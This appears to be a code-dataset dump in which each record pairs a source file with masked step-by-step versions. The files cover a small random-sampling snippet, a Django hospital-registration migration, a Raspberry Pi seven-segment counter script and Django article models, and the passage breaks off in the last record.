code
stringlengths
13
1.2M
order_type
stringclasses
1 value
original_example
dict
step_ids
listlengths
1
5
import random my_randoms = random.sample(100, 10) print(my_randoms)
normal
{ "blob_id": "d39f6fca80f32a4d13764eb5cfb29999785b1d16", "index": 1629, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(my_randoms)\n", "step-3": "<mask token>\nmy_randoms = random.sample(100, 10)\nprint(my_randoms)\n", "step-4": "import random\nmy_randoms = random.sample(100, 10)\nprint(my_randoms)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-06-10 12:20 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='CompleteAddress', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('state', models.CharField(max_length=200)), ('district', models.CharField(max_length=200)), ('city', models.CharField(max_length=200)), ('lendmark', models.CharField(max_length=200)), ('street', models.CharField(max_length=200)), ('pincode', models.IntegerField()), ], ), migrations.CreateModel( name='ContactDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('phone_num', models.IntegerField()), ('mobile_num', models.IntegerField()), ('tollfree_num', models.IntegerField()), ('website', models.URLField()), ('email', models.EmailField(max_length=254)), ], ), migrations.CreateModel( name='HospitalRegistration', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hospital_name', models.CharField(max_length=200)), ('tagline', models.CharField(max_length=200)), ('chief_officer', models.CharField(max_length=100)), ('establishment_act', models.CharField(max_length=300)), ('issue_date', models.DateField(max_length=20)), ('number_of_bades', models.IntegerField()), ('about_us', models.TextField()), ('logo', models.ImageField(upload_to='Images/logo/')), ('hospital_photo', models.ImageField(upload_to='Images/hospital_photo/')), ('reg_certificate', models.ImageField(upload_to='Images/reg_certificate/')), ('license_certificate', models.ImageField(upload_to='Images/license_certificate/')), ], ), ]
normal
{ "blob_id": "d2368ab243a0660cf98f1cf89d3d8f6cc85cefaa", "index": 6384, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='CompleteAddress', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID')), ('state', models.CharField(\n max_length=200)), ('district', models.CharField(max_length=200)), (\n 'city', models.CharField(max_length=200)), ('lendmark', models.\n CharField(max_length=200)), ('street', models.CharField(max_length=\n 200)), ('pincode', models.IntegerField())]), migrations.CreateModel\n (name='ContactDetail', fields=[('id', models.AutoField(auto_created\n =True, primary_key=True, serialize=False, verbose_name='ID')), (\n 'phone_num', models.IntegerField()), ('mobile_num', models.\n IntegerField()), ('tollfree_num', models.IntegerField()), (\n 'website', models.URLField()), ('email', models.EmailField(\n max_length=254))]), migrations.CreateModel(name=\n 'HospitalRegistration', fields=[('id', models.AutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('hospital_name', models.CharField(max_length=200)), (\n 'tagline', models.CharField(max_length=200)), ('chief_officer',\n models.CharField(max_length=100)), ('establishment_act', models.\n CharField(max_length=300)), ('issue_date', models.DateField(\n max_length=20)), ('number_of_bades', models.IntegerField()), (\n 'about_us', models.TextField()), ('logo', models.ImageField(\n upload_to='Images/logo/')), ('hospital_photo', models.ImageField(\n upload_to='Images/hospital_photo/')), ('reg_certificate', models.\n ImageField(upload_to='Images/reg_certificate/')), (\n 'license_certificate', models.ImageField(upload_to=\n 'Images/license_certificate/'))])]\n", "step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='CompleteAddress', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID')), ('state', models.CharField(\n max_length=200)), ('district', models.CharField(max_length=200)), (\n 'city', models.CharField(max_length=200)), ('lendmark', models.\n CharField(max_length=200)), ('street', models.CharField(max_length=\n 200)), ('pincode', models.IntegerField())]), migrations.CreateModel\n (name='ContactDetail', fields=[('id', models.AutoField(auto_created\n =True, primary_key=True, serialize=False, verbose_name='ID')), (\n 'phone_num', models.IntegerField()), ('mobile_num', models.\n IntegerField()), ('tollfree_num', models.IntegerField()), (\n 'website', models.URLField()), ('email', models.EmailField(\n max_length=254))]), migrations.CreateModel(name=\n 'HospitalRegistration', fields=[('id', models.AutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('hospital_name', models.CharField(max_length=200)), (\n 'tagline', models.CharField(max_length=200)), ('chief_officer',\n models.CharField(max_length=100)), ('establishment_act', models.\n CharField(max_length=300)), ('issue_date', models.DateField(\n max_length=20)), ('number_of_bades', models.IntegerField()), (\n 'about_us', models.TextField()), ('logo', models.ImageField(\n upload_to='Images/logo/')), ('hospital_photo', models.ImageField(\n upload_to='Images/hospital_photo/')), ('reg_certificate', models.\n ImageField(upload_to='Images/reg_certificate/')), (\n 'license_certificate', models.ImageField(upload_to=\n 'Images/license_certificate/'))])]\n", "step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.4 on 2016-06-10 12:20\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='CompleteAddress',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('state', models.CharField(max_length=200)),\n ('district', models.CharField(max_length=200)),\n ('city', models.CharField(max_length=200)),\n ('lendmark', models.CharField(max_length=200)),\n ('street', models.CharField(max_length=200)),\n ('pincode', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='ContactDetail',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('phone_num', models.IntegerField()),\n ('mobile_num', models.IntegerField()),\n ('tollfree_num', models.IntegerField()),\n ('website', models.URLField()),\n ('email', models.EmailField(max_length=254)),\n ],\n ),\n migrations.CreateModel(\n name='HospitalRegistration',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('hospital_name', models.CharField(max_length=200)),\n ('tagline', models.CharField(max_length=200)),\n ('chief_officer', models.CharField(max_length=100)),\n ('establishment_act', models.CharField(max_length=300)),\n ('issue_date', models.DateField(max_length=20)),\n ('number_of_bades', models.IntegerField()),\n ('about_us', models.TextField()),\n ('logo', models.ImageField(upload_to='Images/logo/')),\n ('hospital_photo', models.ImageField(upload_to='Images/hospital_photo/')),\n ('reg_certificate', models.ImageField(upload_to='Images/reg_certificate/')),\n ('license_certificate', models.ImageField(upload_to='Images/license_certificate/')),\n ],\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import RPi.GPIO as GPIO import time from datetime import datetime led1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32), ('e', 26), ('d', 24), ('c', 22)] led2 = [('g', 19), ('f', 15), ('a', 13), ('b', 11), ('e', 7), ('d', 5), ('c', 3)] numbers = [ ('a', 'b', 'c', 'd', 'e', 'f'), ('b', 'c'), ('a', 'b', 'g', 'e', 'd'), ('a', 'b', 'g', 'c', 'd'), ('f', 'g', 'b', 'c'), ('a', 'f', 'g', 'c', 'd'), ('a', 'f', 'g', 'c', 'd', 'e'), ('a', 'b', 'c'), ('a', 'b', 'c', 'd', 'e', 'f', 'g'), ('a', 'b', 'c', 'd', 'f', 'g') ] reset = 12 minus = 16 more = 18 GPIO.setmode(GPIO.BOARD) GPIO.setwarnings(False) GPIO.setup(reset, GPIO.IN) GPIO.setup(minus, GPIO.IN) GPIO.setup(more, GPIO.IN) def setupLed1(): for port in led1: GPIO.setup(port[1], GPIO.OUT) def setupLed2(): for port in led2: GPIO.setup(port[1], GPIO.OUT) def statusLed(port, status): GPIO.output(port, status) def turnOnAllLeds(): for led in led1: statusLed(led[1], True) for led in led2: statusLed(led[1], True) def turnOffAllLeds(): for led in led1: statusLed(led[1], False) for led in led2: statusLed(led[1], False) def turnOffOneLed(led): for port in led: statusLed(port[1], False) def createNumber(ledNumber, number): turnOffOneLed(ledNumber) for i in range(10): if number == i: for letter in numbers[i]: for led in ledNumber: if led[0] == letter: statusLed(led[1], True) def createNumber2Leds(led1, led2, number): if number < 10: createNumber(led1, 0) createNumber(led2, number) else: decenas = number / 10 unidades = number % 10 createNumber(led1, decenas) createNumber(led2, unidades) def titileoNumber2Leds(led1, led2, number): for i in range(3): turnOffAllLeds() time.sleep(0.25) createNumber2Leds(led1, led2, number) time.sleep(0.25) def digiTurno(): contador = 0 titileoNumber2Leds(led1, led2, contador) while True: if GPIO.input(reset): contador = 0 print("-"*20+" RESET "+"-"*20) print(datetime.now()) titileoNumber2Leds(led1, led2, contador) print("Numero actual = "+str(contador)) time.sleep(.3) if GPIO.input(more): if contador < 99: contador += 1 else: print(datetime.now()) contador = 0 print("Numero actual = "+str(contador)) createNumber2Leds(led1, led2, contador) time.sleep(.3) if GPIO.input(minus): if contador == 0: contador = 99 else: contador = contador-1 print("Numero actual = "+str(contador)) createNumber2Leds(led1, led2, contador) time.sleep(.3) def main(): setupLed1() setupLed2() turnOffAllLeds() try: print("Presione un boton para continuar") digiTurno() except (KeyboardInterrupt, SystemExit): GPIO.cleanup() if __name__ == "__main__": main()
normal
{ "blob_id": "0d022291f9ace02ef1ee5c462657ea6376a0e6a4", "index": 9436, "step-1": "<mask token>\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\n<mask token>\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\n<mask token>\n", "step-3": "<mask token>\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "<mask token>\nled1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32), ('e', 26), ('d', 24), (\n 'c', 22)]\nled2 = [('g', 19), ('f', 15), ('a', 13), ('b', 11), ('e', 7), ('d', 5), (\n 'c', 3)]\nnumbers = [('a', 'b', 'c', 'd', 'e', 'f'), ('b', 'c'), ('a', 'b', 'g', 'e',\n 'd'), ('a', 'b', 'g', 'c', 'd'), ('f', 'g', 'b', 'c'), ('a', 'f', 'g',\n 'c', 'd'), ('a', 'f', 'g', 'c', 'd', 'e'), ('a', 'b', 'c'), ('a', 'b',\n 'c', 'd', 'e', 'f', 'g'), ('a', 'b', 'c', 'd', 'f', 'g')]\nreset = 12\nminus = 16\nmore = 18\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "import RPi.GPIO as GPIO\nimport time\nfrom datetime import datetime\n\nled1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32),\n ('e', 26), ('d', 24), ('c', 22)]\nled2 = [('g', 19), ('f', 15), ('a', 13),\n ('b', 11), ('e', 7), ('d', 5), ('c', 3)]\nnumbers = [\n ('a', 'b', 'c', 'd', 'e', 'f'),\n ('b', 'c'),\n ('a', 'b', 'g', 'e', 'd'),\n ('a', 'b', 'g', 'c', 'd'),\n ('f', 'g', 'b', 'c'),\n ('a', 'f', 'g', 'c', 'd'),\n ('a', 'f', 'g', 'c', 'd', 'e'),\n ('a', 'b', 'c'),\n ('a', 'b', 'c', 'd', 'e', 'f', 'g'),\n ('a', 'b', 'c', 'd', 'f', 'g')\n]\n\nreset = 12\nminus = 16\nmore = 18\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print(\"-\"*20+\" RESET \"+\"-\"*20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print(\"Numero actual = \"+str(contador))\n time.sleep(.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print(\"Numero actual = \"+str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador-1\n print(\"Numero actual = \"+str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print(\"Presione un boton para continuar\")\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == \"__main__\":\n main()\n", "step-ids": [ 10, 11, 12, 13, 15 ] }
[ 10, 11, 12, 13, 15 ]
from django.db import models from django.utils.safestring import mark_safe from ondoc.authentication.models import TimeStampedModel, CreatedByModel, Image import datetime from django.contrib.contenttypes.models import ContentType from django.urls import reverse from ondoc.doctor.models import Doctor, PracticeSpecialization class ArticleCategory(TimeStampedModel): name = models.CharField(blank=False, null=False, max_length=500) identifier = models.CharField(max_length=48, blank=False, null=True) url = models.CharField(blank=False, null=True, max_length=500, unique=True) title = models.CharField(max_length=500, null=True, blank=True) description = models.CharField(max_length=200000, null=True, blank=True) def __str__(self): return self.name class Meta: db_table = "article_categories" def save(self, *args, **kwargs): if hasattr(self, 'url'): self.url = self.url.strip('/').lower() super(ArticleCategory, self).save(*args, **kwargs) class Article(TimeStampedModel, CreatedByModel): title = models.CharField(blank=False, null=False, max_length=500, unique=True) url = models.CharField(blank=False, null=True, max_length=500, unique=True) heading_title = models.CharField(blank=True, null=False, max_length=500) body = models.CharField(blank=False, null=False, max_length=200000) category = models.ForeignKey(ArticleCategory, null=True, related_name='articles', on_delete=models.SET_NULL) header_image = models.ImageField(upload_to='articles/header/images', null=True, blank=True, default='') header_image_alt = models.CharField(max_length=512, blank=True, null=True, default='') icon = models.ImageField(upload_to='articles/icons', null=True, blank=True, default='') is_published = models.BooleanField(default=False, verbose_name='Published') description = models.CharField(max_length=500, blank=True, null=True) keywords = models.CharField(max_length=256, blank=True, null=True) author_name = models.CharField(max_length=256, null=True, blank=True) author = models.ForeignKey(Doctor, null=True, blank=True, related_name='published_articles', on_delete=models.SET_NULL) published_date = models.DateField(default=datetime.date.today) linked_articles = models.ManyToManyField('self', symmetrical=False, through='LinkedArticle', through_fields=('article', 'linked_article')) pharmeasy_url = models.TextField(blank=True, null=True) pharmeasy_product_id = models.PositiveIntegerField(null=True, blank=True) is_widget_available = models.NullBooleanField() def get_absolute_url(self): content_type = ContentType.objects.get_for_model(self) return reverse('admin:%s_%s_change' % (content_type.app_label, content_type.model), args=[self.id]) def icon_tag(self): if self.icon: return mark_safe('<img src="%s" width="150" height="150" />' % (self.icon.url)) return "" def save(self, *args, **kwargs): self.published_date = self.published_date if self.published_date else datetime.date.today() if hasattr(self, 'url'): self.url = self.url.strip('/').lower() super().save(*args, **kwargs) def __str__(self): return self.title class Meta: db_table = "article" class ArticleImage(TimeStampedModel, CreatedByModel): name = models.ImageField(upload_to='article/images') def image_tag(self): if self.name: return mark_safe('<img src="%s" width="150" height="150" />' % (self.name.url)) return "" def __str__(self): if self.name: return self.name.url return "" class Meta: db_table = "article_image" class ArticleContentBox(TimeStampedModel): name = models.CharField(max_length=1000) title = models.CharField(max_length=1000) rank = models.PositiveSmallIntegerField(default=0, blank=True) def __str__(self): return self.name class Meta: db_table = 'article_content_box' class ArticleLinkedUrl(TimeStampedModel): article = models.ForeignKey(Article, on_delete=models.CASCADE) url = models.CharField(max_length=2000, unique=True) title = models.CharField(max_length=500) content_box = models.ForeignKey(ArticleContentBox,null=True, on_delete=models.SET_NULL) def __str__(self): return self.title class Meta: db_table = 'article_linked_urls' class LinkedArticle(TimeStampedModel): article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name='related_articles') linked_article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name='related_article') title = models.CharField(max_length=500, null=True, blank=False) content_box = models.ForeignKey(ArticleContentBox,null=True, on_delete=models.SET_NULL) def __str__(self): return "{}-{}".format(self.article.title, self.linked_article.title) class Meta: db_table = 'linked_articles' unique_together = (('article', 'linked_article'),) class MedicineSpecialization(TimeStampedModel): medicine = models.ForeignKey(Article, on_delete=models.CASCADE) specialization = models.ForeignKey(PracticeSpecialization, on_delete=models.CASCADE, null=True, blank=True) def __str__(self): return self.medicine.title + " " + self.specialization.name class Meta: db_table = "medicine_specialization"
normal
{ "blob_id": "9bc15f063adc7d2a5ea81d090736ab6ce66a03d4", "index": 5028, "step-1": "<mask token>\n\n\nclass ArticleLinkedUrl(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE)\n url = models.CharField(max_length=2000, unique=True)\n title = models.CharField(max_length=500)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n db_table = 'article_linked_urls'\n\n\nclass LinkedArticle(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_articles')\n linked_article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_article')\n title = models.CharField(max_length=500, null=True, blank=False)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return '{}-{}'.format(self.article.title, self.linked_article.title)\n\n\n class Meta:\n db_table = 'linked_articles'\n unique_together = ('article', 'linked_article'),\n\n\nclass MedicineSpecialization(TimeStampedModel):\n medicine = models.ForeignKey(Article, on_delete=models.CASCADE)\n specialization = models.ForeignKey(PracticeSpecialization, on_delete=\n models.CASCADE, null=True, blank=True)\n\n def __str__(self):\n return self.medicine.title + ' ' + self.specialization.name\n\n\n class Meta:\n db_table = 'medicine_specialization'\n", "step-2": "<mask token>\n\n\nclass Article(TimeStampedModel, CreatedByModel):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n db_table = 'article'\n\n\nclass ArticleImage(TimeStampedModel, CreatedByModel):\n name = models.ImageField(upload_to='article/images')\n\n def image_tag(self):\n if self.name:\n return mark_safe('<img src=\"%s\" width=\"150\" height=\"150\" />' %\n self.name.url)\n return ''\n\n def __str__(self):\n if self.name:\n return self.name.url\n return ''\n\n\n class Meta:\n db_table = 'article_image'\n\n\nclass ArticleContentBox(TimeStampedModel):\n name = models.CharField(max_length=1000)\n title = models.CharField(max_length=1000)\n rank = models.PositiveSmallIntegerField(default=0, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n db_table = 'article_content_box'\n\n\nclass ArticleLinkedUrl(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE)\n url = models.CharField(max_length=2000, unique=True)\n title = models.CharField(max_length=500)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n db_table = 'article_linked_urls'\n\n\nclass LinkedArticle(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_articles')\n linked_article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_article')\n title = models.CharField(max_length=500, null=True, blank=False)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return '{}-{}'.format(self.article.title, self.linked_article.title)\n\n\n class Meta:\n db_table = 'linked_articles'\n unique_together = ('article', 'linked_article'),\n\n\nclass MedicineSpecialization(TimeStampedModel):\n medicine = models.ForeignKey(Article, on_delete=models.CASCADE)\n specialization = models.ForeignKey(PracticeSpecialization, on_delete=\n models.CASCADE, null=True, blank=True)\n\n def __str__(self):\n return self.medicine.title + ' ' + self.specialization.name\n\n\n class Meta:\n db_table = 'medicine_specialization'\n", "step-3": "<mask token>\n\n\nclass Article(TimeStampedModel, CreatedByModel):\n <mask token>\n <mask token>\n <mask 